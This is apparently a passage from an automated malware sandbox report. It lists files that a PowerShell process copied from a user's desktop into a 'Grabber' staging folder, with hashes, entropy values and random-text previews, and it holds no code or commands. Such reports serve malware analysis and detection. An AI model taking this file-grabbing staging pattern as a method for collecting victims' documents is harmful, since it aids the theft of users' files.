                                                                                      Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\DUUDTUBZFW.xlsx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.701195573484743
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                                                      MD5:2530C45A92F347020337052A8A7D7B00
                                                                                      SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                                                      SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                                                      SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\EFOYFBOLXA.docx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696178193607948
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                                                      MD5:960ECA5919CC00E1B4542A6E039F413E
                                                                                      SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                                                      SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                                                      SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\EFOYFBOLXA.xlsx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696178193607948
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                                                      MD5:960ECA5919CC00E1B4542A6E039F413E
                                                                                      SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                                                      SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                                                      SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\EFOYFBOLXA\BJZFPPWAPT.xlsx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.704346314649071
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                                                                                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                                                                                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                                                                                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                                                                                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\EFOYFBOLXA\DUUDTUBZFW.pdf

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.701195573484743
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                                                                                      MD5:2530C45A92F347020337052A8A7D7B00
                                                                                      SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                                                                                      SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                                                                                      SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\EFOYFBOLXA\EFOYFBOLXA.docx

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.696178193607948
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:/X8jyAbnZdGxzRopIIg0xlAqLR61W80Ic9ALjzEk1CceqZQ:gyYnjGxdKL8NlMAzEk0EK
                                                                                      MD5:960ECA5919CC00E1B4542A6E039F413E
                                                                                      SHA1:2079091F1BDF5B543413D549EF9C47C5269659BA
                                                                                      SHA-256:A103755C416B99D910D0F9B374453FADF614C0C87307A63DB0591D47EBBD14F4
                                                                                      SHA-512:57D6AD727BEB9ADB7DED05BC0FCE84B43570492DA4E7A0CCAB42FFF2D4EEF6410AEDC446F2D2F07D9CE524C4640B0FB6E13DCD819051E7B233B35F8672A5ADB7
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:EFOYFBOLXACUDYURQVAYVJXHJUGEEDPZADUOAPPOQQWQWQUHVVNJESQUUMLWZGSPUVGMFUNVUAJZVMUXELMWQMQASSSGGGJJGKEXZJITZCZHBFNFKPSAPJIYNYUGZHKNTNXKHXTBXQPWUVNOKJUTUOXNNMDSUPTQRWVDMMOHKVXWMJEBHSPNNEQFXTJSRJUQDTTDGEDEKBKLUEAXKKKWXKHTVKNTWBHTZOKZNDMJXKTTGHRNAWWIBUILXUMWZIMCXVXLGVWBIWAGGRITYGTHZCIUGGSPBVQPVSAMZBKHRKSRUKMYEZBGFASYOHNDHDAZICVMOQUNZQXFSSSWJJUJLOPCNSUDNPJGXSQCNLKWNAYAVAFMTSLCNOUBHQKHOIALXKEFDFFQBAGKRNRBIWVREZJOOFMLXAZTWLEAOZRHRBFSBONLILGVTOFKSPDKLHKEYWTXRPOWVHUMWWBBJNKSDDHCZCEZBDSJNMTTRGVZQVZUMECWAMCSNGCNYLUINFNXYCBEUKXUHVXAVTHIPURBBNFYVJTFMOLRZVAXLTLVSXETAIDBKHKCPFZAFQDPCXVFIVQQGEEICSHLCAYFSNSDHOELLSCZOGAAUENDMPCOCUFYZDMLPBNKDUGRDZRARSOMIJFRZRZUIHDMSAFFCNVKSOSQISTWGPAEHFMPZCCZNXMQBAWCBEUPECUJREOJQIHRSWCZZFJMFLJKICDWHXVLIXNXPRQGJYJUOGNEDHQPGFRLOHFADQRBTSXNGFAZNOZBJCPSPRRNIVIHFGIRZACAKFSLJETQMVKRUZJTTQSUXQEUOQNSNEMJADFUZUYAEXCLKPKWEYZNEOFNRPIUJKDSUTOXHDBKNTEVKKRRKWGOAZKYTICBSAEESHOCGXXGAWBZZLXBQCOVSSJALBIGTSKJTMZXGQLEURKHCIHHNDAYOKUXKAVYIWQFZVMPKEXXMPJUYHRWAIPFWTLCJRNQCRDENEBUALFGVEULSBFIKWOO

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\EFOYFBOLXA\EWZCVGNOWT.png

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.690071120548773
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
                                                                                      MD5:8F49644C9029260CF4D4802C90BA5CED
                                                                                      SHA1:0A49DD925EF88BDEA0737A4151625525E247D315
                                                                                      SHA-256:C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
                                                                                      SHA-512:CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\EFOYFBOLXA\ZGGKNSUKOP.jpg

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.6959554225029665
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
                                                                                      MD5:DCABA2748DFEAEF0BFBC56FD9F79315C
                                                                                      SHA1:B87FBA690A774893B22B9F611DFDCB5CDC520269
                                                                                      SHA-256:86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
                                                                                      SHA-512:65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

                                                                                      C:\Users\user\AppData\Local\58c563c610509c75e34df9ae09413e8e\user@238576_en-US\Grabber\DRIVE-C\Users\user\Desktop\EIVQSAOTAQ.pdf

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):4.692024230831571
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:RXklo22NBtmSOCPX4hQpKZCuvImjwxwo1:v22NBtxOCYQ0EuwmMxz
                                                                                      MD5:086908C2D2FAA8C9284EAB6D70682A47
                                                                                      SHA1:1BCA47E5FFEC5FD3CE416A922BC3F905C8FE27C4
                                                                                      SHA-256:40C76F418FBB2A515AF4DEC81E501CEB725FD4C916D50FCA1A82B9F5ABC1DCCF
                                                                                      SHA-512:02C48E3CDA1DC748CD3F30B2384D515B50C1DFD63651554AD3D4562B1A47F5446098DCED47A0766D184DDB30B3F158ABEC5877C9CA28AB191CEBB0782C26B230
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:EIVQSAOTAQGMTJLIEKHIWADNDLJLEWUUXVGOFMOKPHABQUHVNBFVSKQIGVIHICGEEXRLSTKQNZUKOHPLLTCYQSLQJMPWPWNUJFUONDXMYCCUPDUBYMPUSUKUOWWSWDLZMDWKNMUKNPKBXAJATSGOQUAMHMZDCDDJRHKOUEDMLSCIOXAHAUFDQKBUBESAKMMFMHDLSSVUQLOZXARPGPMGAAKVDEITBYGGXWIGUIJRVXQOBOIOJWPYSPHZBHWQTMDCUFCWBQSAZNRUOPCLATAERLBPATETXMFUGXBEGMNPKKEZVSRLCYPFEPWIAEINAMGSOXLYWMUKYSQACPSUTGHDCTFLXKAMLOCGYHCMAETHVZNZOCWWUHYAPHFILDNLLBMLSLXIMOFGWTDVLWPHHRGGAWSIGNXEJRIBIBLWFBUASCLZPUIVDERXYLWTNLLRLTFZJTTDGFOEYPFXIPHFKEXHOGEHSFYCCCTGNFQFYETBADKAEAOXYXJWDJWNZPEOBJZTKPLJPPMICDOWUIVDKBQQMHETDORVKZPOWTAZRBAQYYQHBNHIWFZXBILGKHZBLSQJJEIYBHUIDAOEXERQEUMMKBWDXSMLJVAZJQPZARLOBNSTUDCVKLCVBPTKTJWSMPMKSFOQPINFTNEGPVSYCWOXABSGFFKRQDFQEIJWDUMZKILALUHYQZGZOLYMKSAOZGUYCKJOJLYINHVKCTZVXLYIYPGOQZQQAGXVWEBSURTQECDRXYKQAJBEKDNSIHNBZCUBIKPKVWLUOFFCIZSKQBAAPGFMBASMUOKLLGWEHHMYDJCOQEKOBYLYWOOZLBASOJJYLIHZKUGUKHZQBIAVUPYHYEWAYGUFNARHCUKTFMLHSFLRVAELAFCQHPEFUSGNONWLLYQVUVSVEKHDRXJHDSSFJATGDRCTMICJWPFPKKLXECKUXREXEAQNPOBPRKFYRWIW